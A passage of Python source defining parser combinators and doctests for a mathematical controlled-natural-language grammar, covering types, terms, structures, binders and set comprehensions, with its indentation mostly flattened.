['work', 'working', 'effort', 'workaround']
"""
for i in range(len(vs)-1):
if vs[i]== '/-':
vs[i]= '/'
vs[i+1]= vs[i-1]+vs[i+1]
return [v for v in vs if v != '/']
def _syn():
"""parsing synonyms
>>> pstream(Instruction._syn(),'aa/bb,cc/-dd,ee/ff')
[[LexToken(WORD,'aa',1,0), LexToken(SYMBOL,'/',1,2), LexToken(WORD,'bb',1,3)], ...
"""
def f(acc):
return acc[0::2]
def p(tok):
return tok.value in ['/','/-'] or c.can_wordify(tok)
synlist = Parse.next_token().if_test(p).plus()
return c.plus_andcomma(synlist).treat(f,'_syn')
def _treat_syn(acc):
"""build dict for synonyms.
input acc should contain the syn lists in the form
output by _syn.
This function will expand the slashes.
Output Etok(instruction,synonym,...)
"""
#acc11 = acc[1][1]
tt=[Instruction._expand_slashdash([t.value for t in ac]) for ac in acc]
return Etok(name='instruction',etoks=[],raw=acc,rule='synonym',misc=tt)
#d = {'production':'instruction',
# 'raw':lib.flatten(acc),
# 'keyword':'synonym'
# }
#acc11 = acc[1][1]
#d['value']=[Instruction._expand_slashdash([t.value for t in ac]) for ac in acc11]
#return d
def syn():
"""Synonym parser,
output is a fully treated Etok(instruction,synonym,...)
"""
return Instruction._syn().treat(Instruction._treat_syn)
def _treat_instruct(acc):
(_,(keyword,ls),_) = acc
return Etok(name='instruction',etoks=[],raw=acc,rule=keyword.value,misc=Instruction._param_misc(ls))
#{'production':'instruction',
# 'raw':lib.flatten(acc),
# 'keyword':keyword.value,
# 'value':Instruction._param_misc(ls)}
_keywords = """exit timelimit printgoal dump
ontored read library error warning"""
_keyword_instruct = (first_word(_keywords) +
Parse.next_token().possibly())
def instruction():
"""parsing instructions
>>> pstream(Instruction.instruction(),'[exit 1]')
Etok(instruction,exit,'[ exit 1 ]')
>>> pstream(Instruction.instruction(),'[read filename]')
Etok(instruction,read,'[ read filename ]')
>>> pstream(Instruction.instruction(),'[synonym another/extras, yet/-s]')
Etok(instruction,synonym,'[ synonym another / extra yet /- s ]')
"""
def f(acc):
(_,(_,s),_)=acc
return Etok.rawupdate(s, acc)
return (c.bracket(next_word('synonym') + Instruction.syn()).treat(f) |
c.bracket(Instruction._keyword_instruct).treat(Instruction._treat_instruct))
@memo
def expr():
"""parse for expression (term, type, or prop).
Output Etok(expr,...)
>>> pstream(expr(),'TERM')
Etok(expr,term,'TERM')
"""
def f1(nonterminal): #currying
def f(acc):
return Etok('expr',etoks=acc.etoks,raw=acc.raw,rule=nonterminal,misc=acc.misc,altrepr=acc.altrepr)
return f
def get(nonterminal):
return get_lookup_parse(nonterminal).treat(f1(nonterminal),nonterminal)
return first(
get('general_type'),
get('term'),
get('prop'),
get('proof_expr'),
get('sort_expr')
)
@memo
def colon_sort():
def f(acc):
((_,a),e) = acc
if not a:
return Etok.rawupdate(e,acc)
return Etok('coerce_as',etoks=[e],raw=acc)
return (colon_as + get_lookup_parse('sort_expr')).treat(f,'colon_sort')
@memo
def opt_colon_sort():
return colon_sort().possibly()
@memo
def colon_type():
"""Parse a colon then a post_colon_type.
output Etok
>>> pstream(colon_type(),':POST_COLON_TYPE')
Etok(post_colon_type,backdoor1,': POST_COLON_TYPE')
"""
def f(acc):
((_,a),e) = acc
if not a:
return Etok.rawupdate(e,acc)
return Etok('coerce_as',etoks=[e],raw=acc)
return (colon_as + get_lookup_parse('post_colon_type')).treat(f,'colon_type')
@memo
def opt_colon_type():
return colon_type().possibly()
@memo
def opt_colon_sort_or_type():
return (colon_sort() | colon_type()).possibly()
@memo
def var():
"""parser for a single variable.
Accepts a single token that is a variable.
>>> pstream(var(),'x')
Etok(VAR,x,'x')
"""
return c.next_type('VAR').name('VAR').treat(Etok.etok,'VAR')
def annotated(p):
"""
Parser for annotated p in parentheses.
p must output an Etok.
Input is wrapped in parentheses.
Annotation is colon_type or None
Parser output Etok('annotated'...)
etoks:(p,colon_type)
Sample input to parser:
(x : A)
>>> pstream(annotated(var()),'(x:POST_COLON_TYPE)')
Etok(annotated,...,'( x : POST_COLON_TYPE )')
"""
def f(acc):
(_,vs,_) = acc
#if not ann:
# return Etok.rawupdate(v,acc) # cannot guarantee that v is a single Etok.
return Etok('annotated',etoks=vs,raw=acc,rule=p.nonterminal)
return c.paren(p + opt_colon_sort_or_type()).treat(f,'annotated')
@memo
def annotated_var():
return annotated(var())
def annotateds(p):
"""
Parser for annotated list
p must output a list of Etoks.
Input is wrapped in parentheses.
Output Etok.etoks:([p],post_colon_type or None)
Sample input:
(x y z : A)
(u v)
>>> pstream(annotateds(var().plus()),'(x y:POST_COLON_TYPE)')
Etok(annotateds,...,'( x y : POST_COLON_TYPE )')
"""
def f(acc):
(_,(vs,ann),_) = acc
return Etok('annotateds',etoks=(vs,ann),raw=acc,rule=p.nonterminal)
return c.paren(p + opt_colon_type()).treat(f,'annotateds')
@memo
def annotated_vars():
return annotated(var().plus())
@memo
def tvar():
"""
>>> pstream(tvar(),'x')
Etok(VAR,x,'x')
>>> pstream(tvar(),'(x : POST_COLON_TYPE)')
Etok(annotated,VAR,'( x : POST_COLON_TYPE )')
"""
return var() | annotated_var()
@memo
def assign_expr():
"""parser for := followed by an expression
The output is the expression at Etok
>>> pstream(assign_expr(),':= GENERAL_TYPE')
Etok(expr,general_type,':= GENERAL_TYPE')
"""
def f(acc):
(_,e) = acc
return Etok.rawupdate(e,acc)
return (next_value(':=') + expr()).name('assign_expr').treat(f,'assign_expr')
def var_or_atomic(omit=[]):
"""parser for a var or atomic identifier.
The value is not allowed to lie in omit.
Output of parser is a single Etok of one of those types."""
def p(tok):
return not(tok.value in omit)
return (var() | atomic()).if_test(p).name('var_or_atomic')
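# e.g. (a sketch): var_or_atomic(omit=['d']) accepts the token 'x' but
# rejects 'd'; this is how names already in use are excluded while
# parsing patterns.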
def var_or_atomics_(omit=[]):
"""parser for a sequence of one or more var or atomics
>>> pstream(var_or_atomics_(),'x uu vv THE RUN.TO')
[Etok(VAR,x,'x'), ... Etok(ATOMIC,THE,'THE')]
"""
    return var_or_atomic(omit=omit).plus()
@memo
def var_or_atomic_or_blank():
"""parser for var or atomic or _.
The parser output is a single token that is one of those types."""
return var_or_atomic() | next_value('_').treat(Etok.etok)
@memo
def brace_assign():
"""
input semi-separated list of assignments within braces.
output is a Etok(brace_assign)
Etok.etoks: list of (lhs,type annotation,assigned expr)
the last two can be None.
>>> pstream(brace_assign(),'{ x := TERM ; y : POST_COLON_TYPE := TERM }')
Etok(brace_assign,'{ x := TERM ; y : POST_COLON_TYPE := TERM }')
"""
#def f_item(acc):
# ((v,o),p) = acc
# return (v,o,p)
#n_acc = []
#def f_brace(acc):
# nonlocal n_acc
# (_,b,_) = acc
# n_acc = acc # keep full list of tokens
# return b[0::2]
#def f_final(acc):
# return Etok(name='brace_assign',etoks=acc,raw=n_acc)
#def brace_assign_item():
# return (var_or_atomic_or_blank()+ opt_colon_type() + assign_expr().possibly()).name('brace_assign_item').treat(f_item)
#return c.brace_semif().treat(f_brace,'f_brace').reparse_list(brace_assign_item()).treat(f_final,'brace_assign')
def f(acc):
(_,ps,_)=acc
ps = [(v,o,p) for ((v,o),p) in ps[0::2]]
return Etok(name='brace_assign',etoks=ps,raw=acc)
p = (var_or_atomic_or_blank()+ opt_colon_type() + assign_expr().possibly()).name('brace_assign_item')
return c.brace(p.plus(semicolon)).treat(f,'brace_assign_item')
@memo
def brace_noassign():
"""
input semi-separated list of var_or_atomics with possible typing
output is an Etok(brace_noassign)
Etok.etoks list of (lhs,typ annotation or None)
>>> pstream(brace_noassign(),'{x:POST_COLON_TYPE;y}')
Etok(brace_noassign,'{ x : POST_COLON_TYPE ; y }')
"""
#n_acc = []
#def f_brace(acc):
# nonlocal n_acc
# (_,b,_) = acc
# n_acc = acc
# return b[0::2] #remove semi
#def f_final(acc):
# return Etok(name='brace_noassign',etoks=acc,raw=n_acc)
#def brace_noassign_item():
# return (var_or_atomics_() + opt_colon_type())
#return c.brace_semif().treat(f_brace,'f_brace').reparse_list(brace_noassign_item()).treat(f_final,'brace_noassign')
def f(acc):
(_,ps,_)=acc
ps = ps[0::2]
return Etok(name='brace_noassign',etoks=ps,raw=acc)
p = (var_or_atomics_() + opt_colon_type()).name('brace_noassign_item')
return c.brace(p.plus(semicolon)).treat(f,'brace_noassign_item')
@memo
def app_args():
"""
parses the arguments of a function application.
output Etok.toks (brace_assign?,[expr])
>>> pstream(app_args(),'{ x:= TERM } TIGHTEST_EXPR TIGHTEST_EXPR ...')
Etok(app_args,'{ x := TERM } TIGHTEST_EXPR TIGHTEST_EXPR')
"""
def f(acc):
return Etok(name='app_args',etoks=acc,raw=acc)
return (brace_assign().possibly() + get_lookup_parse('tightest_expr').many()).treat(f,'app_args')
def casemark(s):
"""Used to mark different cases in parsing, for later
case-based treatment"""
def f(acc):
return (s,acc)
return f
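# e.g. (a sketch): some_parser.treat(casemark('2')) wraps each result as
# ('2', acc), so a later treatment can dispatch on which alternative
# matched.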
def annotated_args(omit=[]):
"""
parse formal parameters of a function
input variables
omit = list of banned names for variables and atomics
output Etok(annotated_args) , etoks = man
>>> pstream(annotated_args(),'x vv tt')
Etok(annotated_args,'x vv tt')
>>> pstream(annotated_args(),'x (uu v w : POST_COLON_TYPE) y')
Etok(annotated_args,'x ( uu v w : POST_COLON_TYPE ) y')
"""
def f(acc):
return Etok(name='annotated_args',etoks=acc,raw=acc)
return (var_or_atomic(omit) | annotateds(var_or_atomics_(omit))).many().treat(f,'annotated_args')
def args_template(omit=[]):
"""
input parse braced, annotated arguments of
formal function args
output Etok(args_template), can be devoid of data
>>> pstream(args_template(),'{ x ; y ; z} r (s t) v')
Etok(args_template,'{ x ; y ; z } r ( s t ) v')
>>> pstream(args_template(),'')
Etok(args_template,'')
"""
def f(acc):
return Etok(name='args_template',etoks=acc,raw=acc)
return (brace_noassign().possibly() + annotated_args(omit)).treat(f,'args_template')
def nonempty_args_template(omit=[]):
"""This is the same as args_template, except it must
contain data.
>>> pstream(nonempty_args_template(),'{ x ; y ; z} r (s t) v')
Etok(args_template,'{ x ; y ; z } r ( s t ) v')
>>> try:
... pstream(nonempty_args_template(),'')
... except:
... 'invalid'
'invalid'
>>> pstream(nonempty_args_template(omit=['y']),'x y')
Etok(args_template,'x')
"""
def p(etok):
return (etok.rawstring())
return args_template(omit).if_test(p)
@memo
def tightest_arg():
"""
This allows too much. We should restrict to admissible patterns.
>>> pstream(tightest_arg(),'TIGHTEST_EXPR')
Etok(tightest_expr,backdoor1,'TIGHTEST_EXPR')
>>> pstream(tightest_arg(),'(x uu : sort_expr)')
Etok(tightest_arg,'( x uu : sort_expr )')
"""
def f(acc):
(_,(vs,o),_)=acc
return Etok(name='tightest_arg',etoks=(vs,o),raw=acc)
return (get_lookup_parse('tightest_expr') |
c.paren(var_or_atomic().atleast(2) +
opt_colon_sort_or_type()).treat(f,'tightest_arg'))
@memo
def tightest_args():
return brace_noassign().possibly() + tightest_arg().many()
@memo
def holding_vars():
""" input
This is experimental, used to indicate unbound (free) variables in
a sum or list comprehensive.
This is inspired by Harrison's {a | b | c} set comprehension notation.
>>> pstream(holding_vars(),', holding x,y,z')
Etok(holding_vars,', holding x , y , z')
"""
def f(acc):
((_,_),cs) = acc
return Etok(name='holding_vars',etoks=cs[0::2],raw=acc)
return (comma + next_word('holding') + c.plus_comma(var())).treat(f,'holding_vars')
@memo
def proof_expr():
r"""parser for the QED symbol
>>> pstream(proof_expr(),r'\qed')
Etok(SYMBOL_QED,\qed,'\qed')
"""
return c.next_type('SYMBOL_QED').treat(Etok.etok,'proof_expr')
@memo
def tightest_expr():
"""
Parser for expressions in which the boundaries are clear.
"""
return first(get_lookup_parse('tightest_term'),
get_lookup_parse('tightest_prop'),
get_lookup_parse('tightest_type'),
proof_expr())
@memo
def sort_expr():
"""Parser for arrows ending in rawvalue Sort or Type
>>> pstream(sort_expr(),'BINDER_TYPE -> Type')
Etok(sort_expr,'BINDER_TYPE -> type')
"""
def f(acc):
(m,s) = acc
m1 = [a for (a,_) in m]
return Etok(name='sort_expr',etoks=(m1,s),raw=acc)
return c.LazyParse((lambda s:((get_lookup_parse(s) + c.next_type('ARROW')).many() + read_keyword('sort')).treat(f,'sort_expr')),'binder_type')
# colon_sort above
# opt_colon_sort above
@memo
def paren_type():
"""Parser for a type wrapped in parentheses
>>> pstream(paren_type(),'(GENERAL_TYPE)')
Etok(general_type,backdoor1,'GENERAL_TYPE')
"""
def f(acc):
(_,a,_) = acc
return a
return c.paren(get_lookup_parse('general_type')).treat(f,'paren_type')
@memo
def annotated_type():
"""Parser for an annotated type
>>> pstream(annotated_type(),'(GENERAL_TYPE : Type)')
Etok(general_type,backdoor1,'GENERAL_TYPE')
"""
def f(acc):
(_,((a,_),_),_)=acc
return a
return c.paren(get_lookup_parse('general_type') + colon + rawtype).treat(f,'annotated_type')
@memo
def controlseq_type():
"""Parser for a control sequence type
>>> pstream(controlseq_type(),'PRIM_TYPE_CONTROLSEQ { TERM }')
Etok(cs_brace,prim_type_controlseq,'PRIM_TYPE_CONTROLSEQ { TERM }')
"""
return cs_brace(get_lookup_parse('prim_type_controlseq'))
@memo
def const_type():
"""Parser for an identifier representing a type"""
return get_lookup_parse('prim_identifier_type')
@memo
def field_type():
"""Parser for a field of a structure"""
def f(acc):
return Etok('field_type',etoks=acc,raw=acc)
    return (get_lookup_parse('tightest_term') + get_lookup_parse('prim_field_type_accessor')).treat(f,'field_type')
@memo
def over_args():
"""Parser for the experimental feature of using keyword over to
unbundle structures
input (there are three different forms, shown in examples)
output Etok(over_args,1 2 or 3)
>>> pstream(over_args(),'over { a := TERM ; b := TERM }')
Etok(over_args,1,'over { a := TERM ; b := TERM }')
>>> pstream(over_args(),'over TIGHTEST_TERM')
Etok(over_args,2,'over TIGHTEST_TERM')
>>> pstream(over_args(),'(over TIGHTEST_TERM,TIGHTEST_TERM)')
Etok(over_args,3,'( over TIGHTEST_TERM , TIGHTEST_TERM )')
"""
over = next_word('over')
def over_args1():
#n_acc = []
#def f_brace(acc):
# nonlocal n_acc
# (_,(_,b,_)) = acc
# n_acc = acc
# return b[0::2] #remove semi
#def f1(acc):
# return Etok(name='over_args',etoks=acc[0::2],raw=n_acc,rule='1')
#return ((over + c.brace_semif()).treat(f_brace).reparse_list(var_or_atomic() + assign_expr())).treat(f1,'over_args1')
def f(acc):
(_,(_,b,_))=acc
return Etok(name='over_args',etoks=b[0::2],raw=acc,rule='1')
p = (var_or_atomic() + assign_expr())
return (over + c.brace(p.plus(semicolon))).treat(f,'over_args1')
def over_args2():
def f2(acc):
(_,b)=acc
return Etok(name='over_args',etoks=b,raw=acc,rule='2')
return (over + get_lookup_parse('tightest_term')).treat(f2,'over_args2')
def over_args3():
def f3(acc):
(_,(_,b),_)=acc
return Etok(name='over_args',etoks=b[0::2],raw=acc,rule='3')
return (c.paren(over + c.plus_comma(tightest_expr()))).treat(f3,'over_args3')
return first(over_args1() , over_args2() , over_args3())
@memo
def overstructure_type():
"""Parser for overstructure.
    The structure name must be a primitive identifier.
>>> pstream(overstructure_type(),'PRIM_STRUCTURE { x:= TERM } TIGHTEST_EXPR over TIGHTEST_TERM')
Etok(overstructure_type,'PRIM_STRUCTURE { x := TERM } TIGHTEST_EXPR over TIGHTEST_TERM')
"""
def f(acc):
return Etok(name='overstructure_type',etoks=acc,raw=acc)
return (get_lookup_parse('prim_structure') + app_args() + over_args().possibly()).treat(f,'overstructure_type')
@memo
def var_type():
"""
Parser for a type variable.
If not annotated, the var should be
previously annotated (v : Type) in the context.
Output: Etok(VAR_TYPE,v,'v') (in LexToken format)
>>> pstream(var_type(),'(v:Type)')
Etok(VAR_TYPE,v,'( v : type )')
"""
def f(acc):
return acc.update({'name':'VAR_TYPE'})
def f2(acc):
(_,((v,_),_),_) = acc
return Etok.rawupdate(v,acc)
return (var() | c.paren(var() + colon + rawtype).treat(f2)).treat(f,'var_type')
@memo
def subtype():
r"""
Parser for a subtype comprehension { x // P(x)}
>>> pstream(subtype(),r'{ TERM, holding x \tmid STATEMENT }')
Etok(subtype,'{ TERM , holding x \tmid STATEMENT }')
"""
def f(acc):
(_,(((t,h),_),s),_)=acc
return Etok(name='subtype',etoks=(t,h,s),raw=acc)
return c.brace(get_lookup_parse('term') + holding_vars().possibly() + c.next_type('TMID') + get_lookup_parse('statement')).treat(f,'subtype')
@memo
def app_type():
"""Parser for the application of a type to its arguments
>>> pstream(app_type(),'TIGHTEST_TYPE TIGHTEST_EXPR')
Etok(app_type,tightest_type,'TIGHTEST_TYPE TIGHTEST_EXPR')
"""
def f(acc):
return Etok(name='app_type',etoks=acc,raw=acc,rule='tightest_type')
return ((get_lookup_parse('tightest_type') + app_args()).treat(f,'app_type') |
overstructure_type())
@memo
def binder_comma():
"""Parser for a comma in a binder expression"""
def f(acc):
return Etok(name='binder_comma',etoks=[Etok.etok(acc)],raw=[acc])
return comma.treat(f,'binder_comma')
@memo
def binder_type():
"""Recursive parser for type binders (Pi-types, etc.)
>>> pstream(binder_type(),'PRIM_PI_BINDER TIGHTEST_EXPR, TIGHTEST_TYPE')
Etok(binder_type,'PRIM_PI_BINDER TIGHTEST_EXPR , TIGHTEST_TYPE')
"""
def f(acc):
(((p,a),_),b)=acc
return Etok(name='binder_type',etoks=(p,a,b),raw=acc)
return (app_type() |
(get_lookup_parse('prim_pi_binder') + tightest_args() + binder_comma() + c.lazy_call(binder_type)).treat(f,'binder_type')
)
@memo
def agda_vars():
"""
Agda style dependent type variables (a : A ) -> B(a)
>>> pstream(agda_vars(),'(x : POST_COLON_TYPE) (z u : POST_COLON_TYPE)')
Etok(agda_vars,'( x : POST_COLON_TYPE ) ( z u : POST_COLON_TYPE )')
"""
def f(acc):
return Etok(name='agda_vars',etoks=acc,raw=acc)
return annotated_vars().plus().treat(f,'agda_vars')
@memo
def _type_operand():
"""
Parser for argument of a binary type operation.
"""
return binder_type() | agda_vars()
@memo
def _type_op():
"""Parser for a binary type operator
>>> pstream(_type_op(),'PRIM_TYPE_OP')
Etok(prim_type_op,backdoor1,'PRIM_TYPE_OP')
>>> pstream(_type_op(),'PRIM_TYPE_OP_CONTROLSEQ { TERM }')
Etok(cs_brace,prim_type_op_controlseq,'PRIM_TYPE_OP_CONTROLSEQ { TERM }')
"""
return (get_lookup_parse('prim_type_op') |
cs_brace(get_lookup_parse('prim_type_op_controlseq')))
@memo
def binop_type():
"""Parser for binary operation on types.
for product types A * B, sum types A + B,
including arrows A -> B,
including Agda style dependent arrows (x:A) -> B x.
all type operators are right assoc with the same precedence
    N.B. binder_type is tighter than binop_type, which might be non-intuitive.
    Operators appear at the odd positions of etoks[1].
>>> pstream(binop_type(),'TIGHTEST_TYPE PRIM_TYPE_OP TIGHTEST_TYPE')
Etok(binop_type,'TIGHTEST_TYPE PRIM_TYPE_OP TIGHTEST_TYPE')
"""
def f(acc):
((p,m),b) = acc
return Etok(name='binop_type',etoks=(p,m+[b]),raw=acc)
return (brace_noassign().possibly() + (_type_operand() + _type_op()).many() + binder_type()).treat(f,'binop_type')
@memo
def quotient_type():
"""parser for quotient types
>>> pstream(quotient_type(),'quotient of GENERAL_TYPE by TERM')
Etok(quotient_type,'quotient of GENERAL_TYPE by TERM')
"""
def f(acc):
((((_,_),g),_),t) = acc
return Etok(name='quotient_type',etoks=(g,t),raw=acc)
return (next_word('quotient') + next_word('of').possibly() +
get_lookup_parse('general_type') + next_word('by') +
get_lookup_parse('term')).treat(f,'quotient_type')
@memo
def coercion_type():
r"""parser for coercion of a term to type
>>> pstream(coercion_type(),r'\^TERM')
Etok(coercion_type,'\^ TERM')
"""
def f(acc):
(_,t)=acc
return Etok(name='coercion_type',etoks=[t],raw=acc)
return (c.next_type('COERCION') + get_lookup_parse('term')).treat(f,'coercion_type')
@memo
def coerced_type():
"""parser for (possibly implicit) coercion from term to type
>>> pstream(coerced_type(),'TERM')
Etok(coercion_type,'TERM')
"""
def f(acc):
return Etok(name='coercion_type',etoks=[acc],raw=acc)
return (coercion_type() | get_lookup_parse('term').treat(f,'coerced_type'))
@memo
def opentail_type():
"""Parser for binop, quotient, or coercion type"""
return first(binop_type() , quotient_type() , coercion_type())
@memo
def post_colon_type():
"""parser for type appearing after a colon
>>> pstream(post_colon_type(),'PRIM_RELATION')
Etok(post_colon_type,2,'PRIM_RELATION')
"""
def f2(acc):
return Etok(name='post_colon_type',etoks=acc,raw=acc,rule='2')
return first(get_lookup_parse('general_type') ,
(get_lookup_parse('prim_relation') + app_args()).treat(f2,'post_colon_type-2') ,
coerced_type())
# general_type - implement after attribute
@memo
def hierarchical_identifier():
"""
Parser for hierarchical identifiers.
Output is a Etok.
"""
return c.next_type('HIERARCHICAL_IDENTIFIER').treat(Etok.etok,'hierarchical_identifier')
@memo
def identifier():
"""parser for hierarchical or atomic identifier.
Output is a single Etok"""
return (atomic() | hierarchical_identifier()).name('identifier')
@memo
def _opt_alt_constructor():
"""Parser for a single constructor in an inductive type declaration.
>>> pstream(_opt_alt_constructor(),'| id : POST_COLON_TYPE')
Etok(alt_constructor,'| id : POST_COLON_TYPE')
"""
def f(acc):
(((_,i),a),t)=acc
return Etok(name='alt_constructor',etoks=(i,a,t),raw=acc)
return (c.next_type('ALT') + identifier() + args_template() + opt_colon_type()).treat(f,'_opt_alt_constructor')
def not_period(tok):
"""boolean token test for non-period."""
return not(tok.type == 'PERIOD')
#no memo parameter
def not_end(tok):
"""boolean token test for not keyword 'end'"""
return not(tok.value == 'end') and not_period(tok)
@memo
def field_prefix():
"""
parser for field prefixes:
coercion notationless notation parameter type call
These are decorators or attributes.
coercion - structure coerces to this field
parameter - field can float to unbundled position
type - objects can coerce to this type.
call - objects can be used as a function.
notation - field is for notational type classing.
notationless - ??
>>> pstream(field_prefix(),' random ')
Etok(field_prefix,'')
>>> pstream(field_prefix(),'a type,call,notation')
Etok(field_prefix,'a type , call , notation')
"""
def f(acc):
keys = []
if acc:
(_,keys) = acc
keys = keys[0::2]
return Etok(name='field_prefix',etoks=keys,raw=acc)
return (lit('a').possibly() +
c.plus_comma(read_keyword('field_key'))).possibly().treat(f,'field_prefix')
@memo
def field_identifier():
"""Parser for identifier in one field of structure declaration
The word 'proof' or '_' can be used as
anonymous field identifiers for props.
>>> pstream(field_identifier(),'x : POST_COLON_TYPE')
Etok(field_identifier,'x : POST_COLON_TYPE')
>>> pstream(field_identifier(),'proof')
Etok(PROOF,proof,'proof')
"""
def fp(acc):
return Etok(name='PROOF',etoks=[],raw=acc,rule='proof')
def f(acc):
return Etok(name='field_identifier',etoks=acc,raw=acc)
return first(get_lookup_parse('prim_structure') ,
(next_word('proof')|c.next_value('_')).treat(fp) ,
(var_or_atomic() +
opt_colon_sort_or_type()
).treat(f,'field_identifier')
)
@memo
def field():
"""Parser for one field of a structure
>>> pstream(field(),'a call,type,parameter x := TERM')
Etok(field,'a call , type , parameter x := TERM')
"""
def f(acc):
((a,b),c)=acc
return Etok(name='field',etoks=(a,b,c),raw=acc)
return (field_prefix() + field_identifier() + assign_expr().possibly()).treat(f,'field')
@memo
def structure():
"""Parser for a structure declaration
>>> pstream(structure(),'notational structure with parameters { x : POST_COLON_TYPE } with { parameter y := TERM }')
Etok(structure,'notational structure with parameter { x : POST_COLON_TYPE } with { parameter y := TERM }')
"""
def f(acc):
((((n,_),t),_),(_,b,_))=acc
if t:
(_,t)=t
return Etok(name='structure',etoks=(n,t,b[0::2]),raw=acc)
# Prohibit identifiers named 'with' to avoid grammar ambiguity.
return (next_word('notational').treat(Etok.etok).possibly() +
next_word('structure') +
(lit('param').possibly() + nonempty_args_template(omit=['with'])).possibly() +
next_word('with').possibly() +
c.brace(field().plus(semicolon))).treat(f,'structure')
proof_expr # implemented above
@memo
def controlseq_term():
"""parser for terms expressed as control sequences
>>> pstream(controlseq_term(),'PRIM_TERM_CONTROLSEQ { TERM }')
Etok(cs_brace,prim_term_controlseq,'PRIM_TERM_CONTROLSEQ { TERM }')
"""
return cs_brace(get_lookup_parse('prim_term_controlseq'))
@memo
def tightest_prefix():
"""Parser for very tightly bound terms.
This prefix is the stem of the term, to which suffixes are added.
>>> pstream(tightest_prefix(),'33.456')
Etok(DECIMAL,33.456,'33.456')
>>> pstream(tightest_prefix(),'1799')
Etok(INTEGER,1799,'1799')
"""
return first(Parse.next_token().if_types(['DECIMAL','INTEGER','STRING','BLANK','VAR']).treat(Etok.etok,'tightest_prefix') ,
get_lookup_parse('prim_identifier_term') ,
controlseq_term() ,
get_lookup_parse('delimited_term') , #future reference
get_lookup_parse('alt_term')) #future reference
@memo
def tightest_suffix():
"""Recursive parser for suffix to a tightly bound term.
The suffix can be a .field (field accessor) or subscript
"""
return first(get_lookup_parse('prim_field_term_accessor') ,
(c.lazy_call(tightest_subscript))
)
@memo
def tightest_term():
r"""Parser for a tightly bound term
>>> pstream(tightest_term(),r'33.456 PRIM_FIELD_TERM_ACCESSOR\sub(3)')
Etok(tightest_term,'33.456 PRIM_FIELD_TERM_ACCESSOR \sub ( 3 )')
"""
def f(acc):
return Etok(name='tightest_term',etoks=acc,raw=acc)
return (tightest_prefix() + tightest_suffix().many()).treat(f,'tightest_term')
@memo
def tightest_subscript():
"""Parser for subscript
APPLYSUB handles subscripts coming from a TeX file.
The braces have been converted to ()
In brief,
x_1 is an identifier.
x APPLYSUB (1) is equivalent to x 1 and is the de-TeXed form of x_{1}.
x APPLYSUB (i j) is equivalent to x i j. (This is perhaps a surprise.)
x APPLYSUB ((f j)) is equivalent to x (f j).
"""
def f(acc):
(_,(_,t,_))=acc
return Etok(name='apply_sub',etoks=t,raw=acc)
return (c.next_type('APPLYSUB') + c.paren(tightest_term().plus())).treat(f,'tightest_subscript')
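# Illustrative only (not a doctest; the exact Etok repr is not pinned
# down here): after de-TeXing, 'x APPLYSUB (1)' leaves a suffix
# 'APPLYSUB ( 1 )' that this parser consumes, yielding an
# Etok(apply_sub,...) holding the tightest terms inside the parentheses.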
controlseq_term # defined above
var_or_atomic_or_blank # defined above
@memo
def annotated_term():
return annotated(get_lookup_parse('term'))
@memo
def set_enum_term():
"""parser for set enumeration
>>> pstream(set_enum_term(),'{ PLAIN_TERM, PLAIN_TERM, PLAIN_TERM }')
Etok(set_enum_term,'{ PLAIN_TERM , PLAIN_TERM , PLAIN_TERM }')
"""
def f(acc):
(_,t,_)=acc
t = t[0::2]
return Etok(name='set_enum_term',etoks=t,raw=acc)
return c.brace(c.many_comma(get_lookup_parse('plain_term'))).treat(f,'set_enum_term')
@memo
def set_comprehension_term():
"""Parser for set comprehension
>>> pstream(set_comprehension_term(),'{ PLAIN_TERM, holding u,v \mid STATEMENT}')
Etok(set_comprehension_term,'{ PLAIN_TERM , holding u , v \mid STATEMENT }')
"""
def f(acc):
(_,(((p,h),_),s),_)=acc
return Etok(name='set_comprehension_term',etoks=(p,h,s),raw=acc)
return c.brace(get_lookup_parse('plain_term') + holding_vars() + c.next_type('MID') + get_lookup_parse('statement')).treat(f,'set_comprehension_term')
@memo
def tuple_term():
"""Parser for n=tuples.
There must be at least one comma.
(x) is parsed as x in parentheses.
>>> pstream(tuple_term(),'(PLAIN_TERM,PLAIN_TERM,PLAIN_TERM)')
Etok(tuple_term,'( PLAIN_TERM , PLAIN_TERM , PLAIN_TERM )')
"""
def f(acc):
(_,((p,_),ps),_)=acc
ps = [p]+ps[0::2]
return Etok(name='tuple_term',etoks=ps,raw=acc)
return c.paren(get_lookup_parse('plain_term') + comma + c.plus_comma(get_lookup_parse('plain_term'))).treat(f,'tuple_term')
@memo
def list_term():
"""Parser for lists: [a;b;c], possibly empty []
>>> pstream(list_term(),'[PLAIN_TERM;PLAIN_TERM;PLAIN_TERM]')
Etok(list_term,'[ PLAIN_TERM ; PLAIN_TERM ; PLAIN_TERM ]')
"""
def f(acc):
(_,ps,_)=acc
ps = ps[0::2]
return Etok(name='list_term',etoks=ps,raw=acc)
return c.bracket(get_lookup_parse('plain_term').many(semicolon)).treat(f,'list_term')
@memo
def make_term():
"""parser for make statement (structure constructor).
DEBUG: I forget the purpose of the tightest_type.
>>> pstream(make_term(),'make { it : POST_COLON_TYPE := TERM }')
Etok(make_term,'make { it : POST_COLON_TYPE := TERM }')
"""
#def fp(acc):
# ((a,b),c)=acc
# return (a,b,c)
#def f(acc):
# ((_,t),(_,b,_)) = acc
# p = (var_or_atomic_or_blank() + opt_colon_type() +
# assign_expr().possibly()).treat(fp)
# b = c.retreat_list(p,b)
# return Etok('make_term',etoks=(t,b),raw=acc)
#return (next_word('make') + get_lookup_parse('tightest_type').possibly() +
# c.brace_semif()).treat(f,'make_term')
def f(acc):
((_,t),(_,bs,_))=acc
bs = [(a,b,c) for ((a,b),c) in bs[0::2]]
return Etok('make_term',etoks=(t,bs),raw=acc)
p = (var_or_atomic_or_blank() + opt_colon_type() +
assign_expr().possibly())
return (next_word('make') + get_lookup_parse('tightest_type').possibly() +
c.brace(p.plus(semicolon))).treat(f,'make_term')
@memo
def paren_term():
"""parser for term in parentheses
>>> pstream(paren_term(),'(TERM)')
Etok(term,backdoor1,'( TERM )')
"""
def f(acc):
(_,t,_)=acc
return Etok.rawupdate(t,acc)
return c.paren(get_lookup_parse('term')).treat(f,'paren_term')
@memo
def delimited_term():
"""Parser for terms that are delimited:
(x), (x : A), make { x := 3 }, [1;2],
{3,4}, (5,6), {x : f(x)}
>>> pstream(delimited_term(),'(TERM)')
Etok(term,backdoor1,'( TERM )')
"""
return first(paren_term() ,
annotated_term() ,
make_term() ,
list_term() ,
tuple_term() ,
set_enum_term() ,
set_comprehension_term())
@memo
def alt_case():
"""Parser for a single case of a case term
>>> pstream(alt_case(),'| PROP := PLAIN_TERM')
Etok(alt_case,'| PROP := PLAIN_TERM')
"""
def f(acc):
(((_,p),_),t)=acc
